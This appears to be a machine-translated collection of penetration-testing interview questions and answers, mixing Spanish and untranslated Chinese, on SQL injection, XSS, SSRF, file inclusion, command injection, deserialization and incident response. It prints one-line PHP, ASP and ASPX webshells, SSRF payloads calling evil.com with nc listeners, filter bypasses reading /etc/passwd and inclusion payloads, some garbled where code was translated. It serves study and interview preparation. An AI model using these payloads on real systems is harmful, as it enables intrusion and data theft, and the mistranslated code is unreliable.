2.information_schema, almacena información de rendimiento, como tablas y bloqueos
3.test, biblioteca de prueba autoconstruida de mysql
4. Performance_schema, bloqueo mutex y otra información (debe activarse manualmente antes de 5.6, activado de forma predeterminada a partir de 5.6)
Pregunta 23: ¿Cuál es la naturaleza de la vulnerabilidad CSRF?
Respuesta:
La esencia es xss
Pregunta 24: Si se le proporciona una vulnerabilidad XSS, ¿qué otras condiciones necesita para construir un gusano?
Respuesta: Tipo de almacenamiento xss y requiere páginas muy visitadas o botones de seguimiento, como Weibo, foros, etc.
Pregunta 25: En los sitios web de redes sociales, ¿dónde es probable que aparezcan los gusanos?
Respuesta: seguimiento de Weibo, encuesta de informes sociales, comentarios de Tieba, etc.
Pregunta 26: ¿Consejos para encontrar manualmente troyanos de puerta trasera?
Respuesta:
1) En primer lugar, lo más importante a lo que debe prestar atención son los elementos de inicio del sistema. Puede verificar la lista de inicio en la utilidad de configuración del sistema abierta en "Ejecutar" - ingrese "comando msconfig". También debe prestar atención. a los servicios. Si no es demasiado crítico con la computadora, los zapatos para niños familiares sugieren usar la función de aceleración de arranque de 360 Security Guard para verificar si hay elementos de inicio y servicios anormales, porque el 99% de los troyanos de puerta trasera se registrarán como servicios del sistema para lograr el propósito del inicio automático. Si se encuentra un elemento sospechoso, abra directamente la ruta correspondiente, busque el archivo del programa, lo elimine directamente y desactive el inicio automático;
2) Verifique los archivos en el directorio de claves del sistema system32 y el directorio de instalación del sistema Windows. Las rutas predeterminadas para ambos en el sistema xp son C:\WINDOWS\system32 y C:\WINDOWS\ respectivamente. Entonces, ¿hay algún archivo ejecutable o dll sospechoso en los últimos archivos modificados? Estos dos lugares son los escondites favoritos de los troyanos (consejo: asegúrese de configurar una carpeta que muestre todos los archivos).
3) Observe si hay alguna anomalía en la conexión de red. También puede utilizar "Ejecutar" - "cmd" - "netstat -an" para comprobar si hay conexiones de red sospechosas o anormales. Si no está muy familiarizado con las computadoras , le recomendamos que utilice la función de monitoreo de tráfico de 360. Es más intuitivo y conveniente. Preste especial atención al puerto de conexión remota. Si hay un puerto similar a 8000, debe prestarle atención. 8000 es el puerto predeterminado de Grey Pigeon. Recuerdo una vez que encontré el puerto 8000 en la conexión de red durante la prueba del troyano de puerta trasera. Por supuesto, esto no significa que mientras no haya conexión de red en el puerto 8000, será seguro, porque el puerto 8000 es solo el puerto predeterminado para que Gray Pigeon se conecte y el puerto se puede cambiar.
4) A través del método anterior, puede encontrar algunos archivos sospechosos en su computadora. Si se confirma, puede eliminarlos manualmente. Por supuesto, también puedes utilizar el poder del software antivirus. Si encuentra una puerta trasera troyana, no entre en pánico. El mejor método y el más completo es reinstalar el sistema y utilizar la base de datos de virus más reciente en modo seguro para escanear y eliminar el virus.
Pregunta 27: ¿Troyanos de una frase de uso común?
Respuesta:
troyano sentencia asp:
<%ejecutar(solicitud("valor"))%>
Troyano PHP de una frase:
<?php @eval($_POST[valor]);?>
Deformación:
<?php $x=$_GET['z'];@eval(“$x;”);?>
aspx troyano de una frase:
<%@ Idioma de página="Jscript"%>
<%eval(Solicitud.Item["valor"])%>
Pregunta 28: ¿Cómo solucionar problemas después de una invasión del servidor web?
Respuesta:
1) Verifique el registro del servidor web
2) Verifique si hay algún puerto anormal abierto,
3) Utilice un software de seguridad del servidor como SafeDog para limpiar.
Pregunta 29: ¿Cuáles son las pruebas para el certificado?
Respuesta:
La primera certificación internacional de seguridad de la información: CISSP
Certificación nacional de seguridad de la información——CISAW
Certificación nacional de seguridad de la información: CISP
Advenedizo de certificación práctica de tecnología de seguridad de la información: seguridad + TI
Un certificado imprescindible para los auditores: CISA
Pregunta 30: ¿Qué medidas de protección se deben tomar para el servidor IIS?
Respuesta:
1) Mantenga Windows actualizado:
2) Utilice herramientas de prevención de IIS
3) Eliminar el sitio web predeterminado
4.) Si no necesita los servicios FTP y SMTP, desinstálelos
5.) Verifique sus grupos y servicios de administración con regularidad:
6.) Controle estrictamente el acceso de escritura al servidor
7.) Establecer contraseñas complejas
8.) Reducir/excluir el uso compartido en el servidor web
9.) Deshabilite NetBIOS en el protocolo TCP/IP:
10.) Utilice el bloqueo de puertos TCP
11.) Verifique dos veces los archivos *.bat y *.exe: busque *.bat una vez por semana
12.) Administrar la seguridad del directorio IIS:
13.) Utilice seguridad NTFS:
14.) Administrar cuentas de usuario
15.) Audite su servidor web:
Pregunta 31: ¿Cuál es el proceso de prueba de penetración?
Respuesta:
Antes del ataque: inspección de red, escaneo de red, enumeración de red
Bajo ataque: uso de información de vulnerabilidad para realizar ataques de penetración y obtener permisos
Post-ataque: ataques posteriores a la penetración y mantenimiento, copia de archivos, implantación de troyanos, borrado de rastros
Pregunta 32: ¿Cómo se establece la DVWA?
Respuesta:
Inicie el middleware apache y mysql en xampp (XAMPP (Apache+MySQL+PHP+PERL) es un potente paquete de software integrado para la creación de sitios web).
Coloque dvwa en el directorio htdocs bajo xampp
¡Ingrese http://127.0.0.1/dvwa en el navegador para usarlo!
Teoría de preguntas de la entrevista versión de respuesta 1.0
Pregunta 1: ¿En cuántos tipos de inyección SQL se pueden dividir aproximadamente a partir de la respuesta recibida del servidor? (5 puntos)
Respuesta:
Inyección SQL basada en informes de errores, consultas conjuntas, inyección de pila, inyección SQL ciega (inyección booleana, inyección retrasada, inyección de errores)
Inyección de errores (diez funciones comunes de informe de errores: solo responda las tres primeras)
extraer valor(),
piso(),
actualizarxml(),
Exp(),
polígono(),
multipunto(),
cadena multilineal(),
cadena de líneas(),
multipolígono(),
Colección Geometría())
Pregunta 2: ¿Cómo escribir SQL Shell y qué hacer si se filtran las comillas simples? (10 puntos)
Respuesta:
Primero determine si se cumplen las siguientes condiciones:
Si el parámetro Secure_file_priv está vacío, permiso de root, permiso de archivo, GPC está desactivado, conoce la ruta del sitio web relevante y las funciones de lectura y escritura relacionadas:
Función de escritura de archivo: en el archivo de salida, en el archivo de volcado
1. La función de archivo de salida puede exportar varias líneas, mientras que el archivo de volcado solo puede exportar una línea de datos. La función de archivo de salida tiene una conversión de formato especial al escribir datos en un archivo.
2. dumpfile mantiene el formato de datos original
Función de lectura de archivos: load_file()
Determine si existe un permiso de escritura relevante. Si es así, use la función de escritura de archivos correspondiente para escribir código en la ruta del sitio web. Hay filtrado de comillas simples. Puede codificar el contenido de una oración en hexadecimal o intentar usar bytes anchos. Si no hay filtrado, utilice sqlmap –os-shell directamente.
Pregunta 3: ¿En cuántos tipos de xss se dividen aproximadamente y cuáles son las diferencias entre cada tipo? (5 puntos)
Respuesta:
Tipo de almacenamiento, tipo reflectante, tipo DOM
Tipo de almacenamiento:
Almacena el código de ataque XSS relevante directamente en la base de datos y solo requiere que el usuario acceda a la interfaz relevante para activar la ejecución del código relevante. No es necesario que el usuario lo active activamente.
Tipo reflectante:
El código xss relevante se refleja en la respuesta de la página relevante, lo que requiere que el usuario relevante lo active activamente y el usuario envíe datos.
tipo DOM:
Forme xss modificando el nodo DOM de la página
Pregunta 4 : Explique su comprensión de las vulnerabilidades de ssrf (qué es ssrf, cómo usarlo, cómo evitar el filtrado regular en IP, ataque de reenlace de DNS) (20 puntos)
Pregunta 1: ¿Qué es ssrf?
Respuesta:
La falsificación de solicitudes del lado del servidor (SSRF) se refiere a que el atacante utiliza las vulnerabilidades del servidor para enviar una solicitud construida como servidor a la intranet donde se encuentra el servidor cuando el atacante no puede obtener todos los permisos del servidor. Los ataques SSRF normalmente se dirigen a sistemas internos a los que no se puede acceder directamente desde redes externas.
Pregunta 2: método de utilización
Respuesta:
SSRF puede realizar escaneo de puertos en la red externa, la red interna donde se encuentra el servidor y el área local, atacar aplicaciones que se ejecutan en la red interna o localmente, o usar el protocolo de archivos para leer archivos locales.
Qué protocolo se utiliza para operar redis:
protocolo de dictado
Qué protocolo se utiliza para leer el archivo:
archivo://
¿Qué protocolo utiliza el caparazón de rebote?
ardilla de tierra://
url/ssrf.php?url=http://evil.com/gopher.php
<?php
header('Ubicación: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
?>
# nc-v-l 12346
ftp://
ssrf.php?url=sftp://evil.com:11111/
$nc-v-l 11111
dict://
ssrf.php?dict://atacante:11111/
$nc-v-l 11111
tftp://
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
# nc -v -u -l 12346
Problema 3: omisión de IP (uso de expresiones regulares para el filtrado)
Respuesta:
La dirección IP modificada se escribe como: 192.168.0.1
1. Formato octal: 0300.0250.0.1
2. Formato hexadecimal: 0xC0.0xA8.0.1
3. Formato entero decimal: 3232235521
4. Formato entero hexadecimal: 0xC0A80001
5. Dos dígitos combinados: 1.1.278 / 1.1.755
6. Tres dígitos combinados: 1,278 / 1,755 / 3,14159267
Problema 4: ataque de revinculación de DNS
Respuesta:
Descripción de la pregunta 4: Para los parámetros de URL solicitados por el usuario, el servidor primero realizará una resolución DNS en ellos y luego juzgará la dirección IP devuelta por el servidor DNS. Si está en la lista negra, la solicitud estará prohibida.
Existe una diferencia horaria entre la primera vez que se solicita el servicio DNS para la resolución de nombres de dominio y la segunda vez que el servidor solicita la URL, diferencia horaria que se puede utilizar para realizar ataques de rebinding DNS.
Para completar el ataque de revinculación de DNS, necesitamos un nombre de dominio y asignar la resolución de este nombre de dominio a nuestro propio servidor DNS, escribir un servicio de resolución en nuestro servidor DNS controlable y establecer el tiempo TTL en 0. De esta forma se puede realizar el ataque, el proceso completo de ataque es:
1. El lado del servidor obtiene los parámetros de URL, realiza la primera resolución DNS y obtiene una IP que no es de intranet.
2. Juzgue la IP obtenida y, si se determina que es una IP que no está en la lista negra, se pasa la verificación.
3. El servidor accede a la URL. Dado que el TTL establecido por el servidor DNS es 0, la resolución DNS se realiza nuevamente. Esta vez el servidor DNS devuelve la dirección de intranet.
4. Dado que se omitió la verificación, el servidor devuelve el resultado del acceso a los recursos de la intranet.
Pregunta 5: Métodos de uso comunes para cargar archivos (10 puntos)
Pregunta 1: métodos de derivación comunes
Respuesta:
Verificación js frontal: deshabilite js o cambie directamente el paquete con burp
Verificación del tipo de archivo: modificar el encabezado http Tipo de contenido, tipo MIME
Lista negra: cargar sufijo analizable especial, cargar .htaccess, .user.ini, omitir mayúsculas y minúsculas, omitir punto, espacio, ::$DATA omitir, cooperar con la vulnerabilidad de análisis, omitir nombre de doble sufijo
Lista blanca: omisión de MIME, truncamiento %00, truncamiento 0x00, truncamiento 0x0a
Verificación del contenido del archivo: verificación del encabezado del archivo, ruptura de getimagessize(), ruptura de exif_imagetype(), representación secundaria
Otros: competencia condicional
Análisis de vulnerabilidades con middleware relacionado: vulnerabilidades de análisis iis6.0, iis7.0, vulnerabilidades de análisis iis7.5, vulnerabilidades de análisis de apache, vulnerabilidades de análisis de nginx
Pregunta 2: Determine el método para resolver el nombre del sufijo
Respuesta:
prueba de pelusa
Pregunta 6: Inyección de comando de funciones peligrosas comunes (5 puntos)
Respuesta:
Funciones PHP:
• sistema
• ejecutivo
• pasar a través de
• shell_exec
• popen
• proc_open
• evaluar
• afirmar
• pasar a través de
• pcntl_exec
• call_user_func_array
• crear_función
función de Python:
• sistema
• popen
• subproceso.llamada
• Aparecer
Java:
• java.lang.Runtime.getRuntime().exec(comando)
Pregunta 7: Delimitadores de comandos comunes en php (5 puntos)
Respuesta:
%0a, %0d, \r, \n, ;, &, &&, |, ||
Pregunta 8: Métodos de omisión comunes (omisión de espacio, lista negra) (10 puntos)
Pregunta 1: Cómo omitir espacios
Respuesta:
• <símbolo gato<123
• \t/%09
• ${IFS} donde {} se utiliza para truncamiento. Por ejemplo, cat$IFS2 se considerará IFS2 como nombre de variable. Además, agregar $ al final puede producir un efecto de truncamiento. Generalmente se usa $ 9, porque $ 9 es el titular del noveno parámetro del proceso de shell del sistema actual y siempre es una cadena vacía.
Problema 2: omisión de la lista negra
Respuesta:
• a=l;b=s;$a$b
• base64 echo "bHM=" | base64 -d
• /?in/?s => /bin/ls Uso de caracteres comodín
• Conector cat /etc/pass'w'd
• Variable de inicialización no definida cat$x /etc/passwd
Pregunta 9: El archivo contiene vulnerabilidades (10 puntos)
Problema 1: el archivo contiene un formulario de vulnerabilidad y una función PHP común
<?php include("inc/" . $_GET['archivo']); ?>
Respuesta:
1. incluir (si ocurre un error durante el proceso de inclusión, se informará un error y no afectará la ejecución de declaraciones posteriores)
2. include_once (incluir solo una vez)
3. requerir (se produjo un error de código durante el proceso de inclusión, el código posterior no se ejecutará)
4. require_once (contiene solo una vez)
Pregunta 2: Formas de inclusión comunes
Respuesta:
1. El mismo directorio contiene file=.htaccess y agrega directamente los archivos relevantes en el directorio actual.
2. ¿Recorrido de directorio?file=../../../../../../../../../var/lib/locate.db
3. ¿Inyección de registros?file=../../../../../../../../../var/log/apache/error.log
4. Utilice /proc/self/environ
Los registros se pueden probar utilizando varias fuentes de registro, como registros SSH o registros web.
Pregunta 10: Recomendaciones comunes de uso de pseudoasociaciones de PHP y condiciones de uso relacionadas (10 puntos)
Respuesta:
1. php://entrada
Se puede obtener el flujo de datos posteriores
Condiciones de Uso:
enable_url_include=Activado
enable_url_fopen-Apagado/Activado
Instrucciones:
archivo =php://entrada
ENVIAR:phpinfo();
2. php://filtro
Se puede obtener el código fuente del archivo especificado, pero cuando se combina con la función de inclusión, la secuencia php://filter se ejecutará como un archivo php. Por eso, generalmente lo codificamos para que no se ejecute. provocando así lecturas de archivos arbitrarias
Condiciones de Uso:
enable_url_fopen=Desactivado/Activado
enable_url_include=Desactivado/Activado
Instrucciones;
?file=php://filtro/read=convert.base64-encode/resource=phpinfo.php
3. zip://
Puede acceder a los archivos en el paquete comprimido. Cuando se combina con la función de inclusión, la secuencia zip:// se ejecutará como un archivo PHP. Esto permite la ejecución de archivos arbitrarios. Tipos similares incluyen: zlib:// y bzip2://
Condiciones de Uso:
Debe ser un paquete comprimido zip (el sufijo no importa, siempre y cuando el formato del archivo sea zip).
enable_url_fopen=Desactivado/Activado
enable_url_include=Desactivado/Activado
PHP>=5.2
Instrucciones:
zip://[ruta absoluta al paquete comprimido]#[archivos en el paquete comprimido]
?archivo=zip://D:\zip.zip%23phpinfo.txt
4. far://
Al igual que zip://, están disponibles rutas absolutas y relativas.
Condiciones de Uso:
Debe ser un paquete comprimido zip (el sufijo no importa, siempre y cuando el formato del archivo sea zip).
enable_url_fopen=Desactivado/Activado
enable_url_include=Desactivado/Activado
PHP>=5.2
Instrucciones:
zip://[ruta absoluta al paquete comprimido]#[archivos en el paquete comprimido]
?file=zip://D:\zip.zip/phpinfo.php (la diferencia con zip:// es que uno es # y el otro es /)
5. datos: //
También similar a php://entrada
Condiciones de Uso:
enable_url_fopen=Activado
enable_url_include=Activado
Instrucciones:
?archivo=datos://,<?php phpinfo();
?archivo=datos://texto/plain,<php phpinfo();
?archivo=datos://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
?archivo=datos:texto/plain,<php phpinfo();
?archivo=datos:texto/sin formato;base64,PD9waHAgcGhwaW5mbygpPz4=
Pregunta 11: Inyección de plantilla (5 puntos)
Respuesta:
Se utiliza un motor de plantillas para representar contenido utilizando datos dinámicos. Estos datos contextuales suelen ser controlados por el usuario y formateados mediante plantillas para generar páginas web, correos electrónicos, etc. El motor de plantillas procesa datos contextuales mediante el uso de construcciones de código (como declaraciones condicionales, bucles, etc.), lo que permite el uso de potentes expresiones de lenguaje en plantillas para representar contenido dinámico. Si un atacante puede controlar la plantilla que se representa, podría inyectar expresiones que podrían exponer datos de contexto o incluso ejecutar comandos arbitrarios en el servidor.
Pregunta 12: Dónde ocurren vulnerabilidades comunes en la lógica empresarial (10 puntos)
Respuesta:
1. Tipo de transacción
Modificar el precio pagado
Modificar estado de pago
Modificar la cantidad de compra a un número negativo
Modificar la cantidad para que sea un número negativo
Repetir solicitud exitosa
并发数据库锁处理不当
2. 账户
注册:覆盖注册,尝试重复用户名,注册遍历猜解已有账号
登录:撞库,账号劫持,尝试账号密码锁死账户
找回密码:重置任意用户名,密码重置后新密码在返回包中,Token验证逻辑在前端,X-Forwarded-Host处理不正确
修改密码:越权修改密码,修改密码没有旧密码验证
申诉:身份伪造,逻辑绕过
信息查询:权限限制不当可以越权查询,用户信息ID可以猜测导致遍历
3. 验证码
验证码:验证码可重用
验证码可预测
验证码强度不够
验证码无时间限制或者失效时间长
验证码无猜测次数限制
验证码传递特殊的参数或不传递参数绕过
验证码可从返回包中直接获取
验证码不刷新或无效
验证码数量有限
验证码在数据包中返回
修改Cookie绕过
修改返回包绕过
验证码在客户端生成或校验
验证码可OCR或使用机器学习识别
验证码用于手机短信/邮箱轰炸
问题13:越权漏洞大致有几种类型(10分)
答案:
未授权访问
水平越权:
攻击者可以访问与他拥有相同权限的用户的资源
权限类型不变,ID改变
垂直越权:
低级别攻击者可以访问高级别用户的资源
权限ID不变,类型改变
交叉越权:
权限ID改变,类型改变
问题14:php和java反序列化的原理(10分)
答案:
php中围绕着serialize(),unserialize()这两个函数,序列化就是把一个对象变成可以传输的字符串,如果服务器能够接收我们反序列化过的字符串、并且未经过滤的把其中的变量直接放进这些魔术方法里面的话,就容易造成很严重的漏洞了。
0:7:" chybeta":1:{s:4:"test" ;s:3:" 123";}这里的0代表存储的是对象(object) ,假如你给serialize(传入的是一个数组,那它会变成字母a。7表示对象的名称有7个字符。" chybeta"表示对象的名称。1表示有一个值。{s:4:"test";s:3:"123";}中, s表示字符串,4表示该字符串的长度,"test"为字符串的名称,之后的类似。当传给unserialize()的参数可控时,我们可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数。
Java序列化是指把Java对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的writeObject()方法可以实现序列化。Java反序列化是指把字节序列恢复为Java对象的过程,ObjectInputStream类的readObject()方法用于反序列化。
问题15:常见的shell反弹方式(5分)
答案:
bash反弹,nc反弹,powershell反弹,msf反弹,Cobalt strike反弹shell,ew反弹,awk反弹,telnet反弹,socat反弹,各种语言相关的反弹
问题16:拿到一个待检测的站,应该做什么(10分)
答案:
1. 信息收集
1) 服务器的相关信息(真实ip, 系统类型,版本,开放端口,WAF等)
2) 网站指纹识别(包括,cms, cdn,证书等),dns记录
3) c、whois信息, 姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)
4) 子域名收集,旁站,C段等
5) google hacking针对化搜索,pdf文件, 中间件版本,弱口令扫描等
6) 扫描网站目录结构,爆后台,网站banner, 测试文件,备份等敏感文件泄漏等
7) 传输协议,通用漏洞,exp, github源码等
2. 漏洞挖掘
1) 浏览网站,看看网站规模,功能,特点等
2) 端口,弱口令,目录等扫描,对响应的端口进行漏洞探测,比如rsync,心脏出血,mysql,ftp,ssh弱口令等。
3) XSS, SQL注入,上传,命令注入,CSRF, cookie安全检测, 敏感信息,通信数据传输,暴力破解,任意文件上传,越权访问,未授权访问,目录遍历,文件包含,重放攻击(短信轰炸),服务器漏洞检测,最后使用漏扫工具等
3. 漏洞利用权限提升
1) mysq|提权,serv-u提权, oracle提权
2) windows 溢出提权
3) linux脏牛, 内核漏洞提权
4. 清楚测试数据并输出报告
1) 日志、测试数据的清理
2) 总结,输出渗透测试报告,附修复方案
5. 复测
1) 验证并发现是否有新漏洞,输出报告,归档
问题17:常见的加密算法(20分)
答案:
1. 对称加密算法
使用同一个秘钥进行加密和解密。
优点是速度较快,适合对数据量比较大的数据进行加密。
缺点是密钥的保存方式需要保证,一旦加密或者解密的哪一方泄漏了密钥,都会导致信息的泄漏。
常用的对称加密算法有:DES、3DES、DESX、Blowfish、IDEA、RC4、RC5、RC6、AES。
2. 非对称加密算法
与对称加密相对的,非对称加密需要两个密钥,一个公开密钥(Public Key),一个私有密钥(Private Key)。公钥和私钥是一对,如果使用公钥进行加密的数据,只有对应的私钥才能解密。相对的,如果是使用私钥加密的数据,只有对应的公钥才能解密。
优点是公钥可以被任何人知道,而公钥的泄漏也不会导致信息泄漏,但是一旦私钥泄漏了就会导致信息泄漏。
常用的非对称加密算法有:RSA、ECC(移动设备用)、Diffie-Hellman、El Gamal、DSA(数字签名用)。
3. hash算法
Lo especial del algoritmo Hash (algoritmo hash hash) es que es un algoritmo unidireccional, es decir, irreversible. El usuario puede utilizar el algoritmo Hash para generar un valor Hash único de una longitud específica para la información de destino. , Pero no se puede reutilizar a través de este valor Hash Obtenga información del objetivo.
Debido a esta característica, el algoritmo Hash se suele utilizar en lugares como el almacenamiento de contraseñas irreducibles y la verificación de la integridad de la información.
Los algoritmos Hash más utilizados son: MD2, MD4, MD5, HAVAL, SHA, SHA-1, HMAC, HMAC-MD5, HMAC-SHA1.
Pregunta 18: Describa brevemente el proceso de cifrado y descifrado de rsa (20 puntos)
Respuesta:
Cifrado RSA: clave asimétrica, algoritmo de clave pública El cifrado RSA utiliza las características de una función unidireccional que es muy sencilla de resolver en dirección directa y muy compleja en dirección inversa.
Un algoritmo de cifrado basado en la característica de que es fácil multiplicar dos números primos pero difícil descomponer sus números compuestos. n = p1 * p2, es fácil encontrar n cuando se conocen p1 y p2, pero es difícil encontrar p1 y p2 cuando se conoce n.
(m^e) mod n=c, es fácil encontrar c cuando se conocen m, e y n, pero es difícil encontrar m cuando se conocen e, n y c.
Generación de claves públicas n y e: seleccione aleatoriamente dos números primos p1 y p2, n = p1 * p2, y luego seleccione aleatoriamente un número entero e, e y φ (n) son primos relativos.
Proceso de cifrado: (m^e) mod n=c, donde m es la información original, c es la información cifrada y n y e son las claves públicas.
Proceso de descifrado: (c^d) mod n=m, donde d es la clave de descifrado.
Pregunta 19: Uso de la colisión crc32 (10 puntos)
Respuesta:
CRC (código de verificación de redundancia), CRC32 significa que se generará un valor de verificación de 32 bits. Al generar CRC32, cada bit del bloque de datos de origen participa en la operación, por lo que incluso si solo cambia un bit en el bloque de datos, se obtendrá un valor CRC32 diferente. Usando este principio, podemos explotar directamente el contenido del archivo cifrado. . Debido a la potencia de la CPU, la colisión CRC sólo se puede utilizar si los archivos comprimidos son pequeños.
Pregunta 20: Procedimientos específicos para respuesta a emergencias (10 puntos)
Respuesta:
Modelo PDCERF
1. Preparar: preparar herramientas y personas para las pruebas.
2. Detección: Monitoreo de eventos de emergencia: incluidos registros en firewalls, sistemas, servidores web, IDS/WAF/SIEM, usuarios anormales o que han realizado operaciones no autorizadas e incluso informes de administradores
3. Contención: Primero, controle el alcance del daño y evite que el impacto del ataque se extienda a otros activos de TI y entornos comerciales. Recuerde no invertir directamente toda su energía en bloquear la puerta trasera. Lo siguiente que debe hacer es encontrar la causa raíz, resolverla por completo, bloquear la fuente del ataque y restaurar el negocio a un nivel normal.
4. Erradicación
5. Recuperarse
6. Seguimiento: basado en diversos monitoreos para determinar que no existen otros comportamientos de ataque ni vectores de ataque, seguido de reuniones para reflexionar sobre el incidente, redactar informes y mejorar continuamente los procesos de trabajo y la mitigación del trabajo.
Pregunta de la entrevista 1
Pregunta 1: ¿Cómo utilizar la ruta absoluta en PHP?
Respuesta:
Las comillas simples provocan errores en la base de datos
Acceder a parámetros incorrectos o rutas incorrectas
Archivos de clase de sonda como phpinfo
Escanear archivos de prueba recuperados de desarrollo
piratería de google
Ruta de informes de phpmyadmin:/phpmyadmin/libraries/lect_lang.lib.php
Explotación de vulnerabilidades para leer archivos de configuración y encontrar rutas
Uso malicioso de funciones del sitio web, como la función de lectura de imágenes local para leer imágenes inexistentes, carga de archivos que no se pueden importar normalmente en el punto de carga.
Pregunta 2: ¿Cuáles son las herramientas de penetración que utiliza habitualmente y cuál es la más utilizada?
Respuesta:
burp, nmap, sqlmap, awvs, ant Sword, ice scorpion, dirsearch, Yujian, etc.
Pregunta 3: Utilización de escritura ciega XSS en el servidor de intranet
Respuesta:
gerente de pesca
recoger mensaje
Pregunta 4: ¿Ataques con arpones y ataques con abrevaderos?
Respuesta:
Ataque de lanza: se refiere al uso de un programa de caballo de Troya como archivo adjunto de correo electrónico y enviarlo a la computadora de destino, induciendo a la víctima a abrir el archivo adjunto para infectar el caballo de Troya.
Ataque de abrevadero: analice los patrones de actividad de Internet del objetivo del ataque, encuentre las debilidades de los sitios web visitados con frecuencia por el objetivo del ataque, irrumpa en el sitio web e implante programas maliciosos, esperando que el objetivo acceda
Pregunta 5: ¿Qué es el escape de la máquina virtual?
Respuesta:
Explotar vulnerabilidades en el software de la máquina virtual o en el software que se ejecuta en la máquina virtual para atacar o controlar el sistema operativo del host de la máquina virtual.
Pregunta 6: ¿Ataque de intermediario?
Respuesta:
principio:
En la misma LAN, interceptando datos de comunicación de red normales y realizando manipulación y rastreo de datos.
defensa:
Vincular la dirección MAC e IP de la puerta de enlace al host como estática
Vincular la dirección IP y MAC del host en la puerta de enlace
Utilice el cortafuegos ARP
Pregunta 7: ¿Proceso de protocolo de enlace de tres vías TCP?
Respuesta:
Primer apretón de manos: al establecer una conexión, el cliente envía un paquete de sincronización (syn = j) al servidor y ingresa al estado SYN_SEND, esperando la confirmación del servidor.
第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态
第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手
问题8:七层模型?
答案:
应用层、表示层、会话层、传输层、网络层、数据链路层、物理层
问题9:对于云安全的理解
答案:
融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念,通过网状的大量客户端对网络中软件行为的异常监测,获取互联网中木马、恶意程序的最新信息,传送到Server端进行自动分析和处理,再把病毒和木马的解决方案分发到每一个客户端
问题10:了解过websocket吗?
答案:
WebSocket是一种在单个TCP连接上进行全双工通信的协议,最大特点是服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送信息,是真正的双向平等对话。
问题11:DDOS是什么?有哪些?CC攻击是什么?区别是什么?
答案:
DDOS:
分布式拒绝服务攻击,利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应
主要方式:
SYN Flood
UDP Flood
ICMP Flood
Connection Flood
HTTP Get
UDP DNS Query Flood
CC攻击:
模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面,造成服务器资源的浪费,CPU长时间处于100%,网络拥塞
两者区别:
CC攻击网页,DDOS攻击服务器,更难防御
CC门槛较低,DDOS需要大量服务器
CC持续时间长,DDOS产生的影响大
问题12:land攻击是什么
答案:
局域网拒绝服务攻击,DDOS攻击的一种,通过发送精心构造的、具有相同源地址和目标地址的欺骗数据包,致使缺乏相应防护机制的目标设备瘫痪
问题13:你会如何进行信息收集?
答案:
Información del servidor: ip, middleware, sistema operativo
Nombre de dominio whois, ipwhois, propiedad del segmento de red
Detección de subdominio
Escaneo de directorio de sitios web, escaneo de información de interfaz
escaneo de puertos
Buscar información relacionada en los principales motores
Pregunta 14: ¿Qué es un ataque de inyección CRLF?
Respuesta:
Al inyectar caracteres de "retorno de carro" y "avance de línea" en la secuencia HTTP, se puede lograr manipulación de sitios web, secuencias de comandos entre sitios, secuestro, etc.
Pregunta 15: ¿Prevenir XSS desde la perspectiva del front-end y del back-end?
Respuesta:
Interfaz:
Los caracteres especiales ingresados por el usuario se filtran y se escapan en entidades html
Codificación de salida del usuario
extremo posterior:
codificación materializada
Filtro de funciones
Limitar la longitud de los caracteres
Pregunta 16: ¿Cómo proteger la seguridad de un puerto?
Respuesta:
Utilice WAF, IDS, IPS y otros dispositivos
Los puertos de servicio peligrosos prohíben el acceso externo o restringen el acceso IP
Versión actualizada periódicamente del servicio.
Pregunta 17: ¿Ideas de detección de Webshell?
Respuesta:
Detección estática: firmas coincidentes, valores propios, funciones peligrosas
Detección dinámica: WAF, IDS y otros equipos
Detección de registros: filtrado basado en patrones de acceso a IP y patrones de acceso a páginas
Monitoreo de integridad de archivos
Pregunta 18: ¿Cómo probar la vulnerabilidad de un sitio web IIS? (según versión)
Respuesta:
https://mp.weixin.qq.com/s/5XV984kErF2Zhh-P5aoUwQ
Pregunta 19: Resumen de problemas de inyección SQL
Respuesta:
https://mp.weixin.qq.com/s/frwK49IatUqUoT-4DR08GQ
Pregunta 20: ¿Qué es GPC? ¿Cómo evitarlo si está habilitado?
Respuesta:
GPC:
Magic_quotes_gpc en el archivo de configuración php.ini implementa la adición de barras invertidas a comillas simples, comillas dobles, barras invertidas y caracteres NULL pasados en get, post y cookie\
Derivación:
El GPC de PHP5 ignora $_SERVER y puede inyectarse en el encabezado de la solicitud http.
inyección secundaria
inyección de bytes anchos
Pregunta 21: ¿Cuáles son los algoritmos de cifrado que se utilizan habitualmente en la web?
Respuesta:
Cifrado hash unidireccional MD5, SHA, MAC
Cifrado simétrico AES, DES
Cifrado asimétrico RSA, RSA2
Pregunta 22: ¿Qué más puede hacer XSS además de recibir cookies?
Respuesta:
Obtener ip de administrador
gusano xss
Ataque de suplantación de identidad
Minería JS frontal
registro de teclas
Capturas de pantalla
Secuestro de red de operador (u otro)
Secuestro de operadores: publicidad
Secuestro de DNS: alterar el DNS y secuestrar la red por diversos medios
Pregunta 23: ¿Qué es la suplantación de DNS?
Respuesta:
Un comportamiento engañoso en el que los atacantes se hacen pasar por servidores de nombres de dominio.
Pregunta 24: Principios y defensas contra el desbordamiento del búfer
Respuesta:
principio:
Cuando la cantidad de datos escritos en el búfer excede la capacidad máxima del búfer, se produce un desbordamiento del búfer y los piratas informáticos explotan los datos desbordados para formar una vulnerabilidad de ejecución remota de código.
defensa:
Defensa basada en el sistema operativo
Comprobación de límites de búfer
Programación segura
Pregunta 25: Respuesta de emergencia a incidentes de seguridad de la red
Respuesta:
Desconectarse de Internet: Dar prioridad a desconectarse de Internet cuando las condiciones lo permitan para evitar nuevas operaciones por parte de piratas informáticos o la eliminación de rastros.
Forense: encuentre la IP del pirata informático analizando los registros de inicio de sesión, los registros de sitios web y los registros de servicios para ver las operaciones realizadas por el pirata informático.
